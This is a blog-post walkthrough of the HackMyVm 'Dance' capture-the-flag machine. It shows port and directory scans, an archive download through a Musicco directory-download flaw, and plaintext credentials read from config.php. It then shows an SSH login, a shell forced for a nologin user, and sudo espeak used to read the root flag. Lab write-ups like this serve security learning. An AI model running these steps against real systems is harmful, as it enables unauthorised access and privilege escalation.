Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Dance Walkthrough

HackMyVm Dance Walkthrough

Scan ports first.

 nmap -sV -sC -p- -oN ports.log
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found /music.

 ~ gobuster dir -u -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 121]
 /music                (Status: 301) [Size: 169] [-->]

Enter /music in web browser, check information, it's a web app called musicco.


Search exploit of musicco.

 ~ searchsploit musicco
  Exploit Title                                                                                                             |  Path
 Musicco 2.0.0 - Arbitrary Directory Download                                                                               | php/webapps/45830.txt

Through the exploit, we can download the whole html dir as a zip file.

 ~ wget '' -O

Unzip, check /music/config.php, get some credentials.

 ~ cat config.php   
 $_CONFIG['saveConfig'] = '';
 $_CONFIG['users'] = array(
          array('admin', 'admin', 'true'),
          array('guest', 'guest', 'false'),
         array('aria', 'seraphim', 'false'),
         array('alice', 'rememberyou', 'false'),
         array('ava', 'password', 'false'),
         array('alba', 'thehostof', 'false'),
 $_CONFIG['lang'] = 'en';
 $_CONFIG['musicRoot'] = 'music';
 $_CONFIG['coverFileName'] = 'folder';
 $_CONFIG['coverExtension'] = '.png';
 $_CONFIG['loadLyricsFromFile'] = 'on';
 $_CONFIG['downLoadMissingCovers'] = 'on';
 $_CONFIG['searchEngine'] = '';
 $_CONFIG['imageSearchEngine'] = '';

We can login ssh as user aria.

 ~ ssh aria@
 aria@dance:~$ id
 uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Another user is alba, but it's nologin.

 aria@dance:~$ cat /etc/passwd|grep alba

So we need to set the login shell for alba, then escalate to user alba.

 aria@dance:~$ su -s /bin/bash alba
 alba@dance:/home/aria$ id
 uid=1001(alba) gid=1001(alba) groups=1001(alba)

Check sudo -l.

 alba@dance:/home/aria$ sudo -l
 Matching Defaults entries for alba on dance:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User alba may run the following commands on dance:
     (root) NOPASSWD: /usr/bin/espeak

The last step is to use espeak to read (or listen to) /root/root.txt.

 alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt  -q -X
 Translate 'rootflag'



Powered By Z-BlogPHP 1.7.1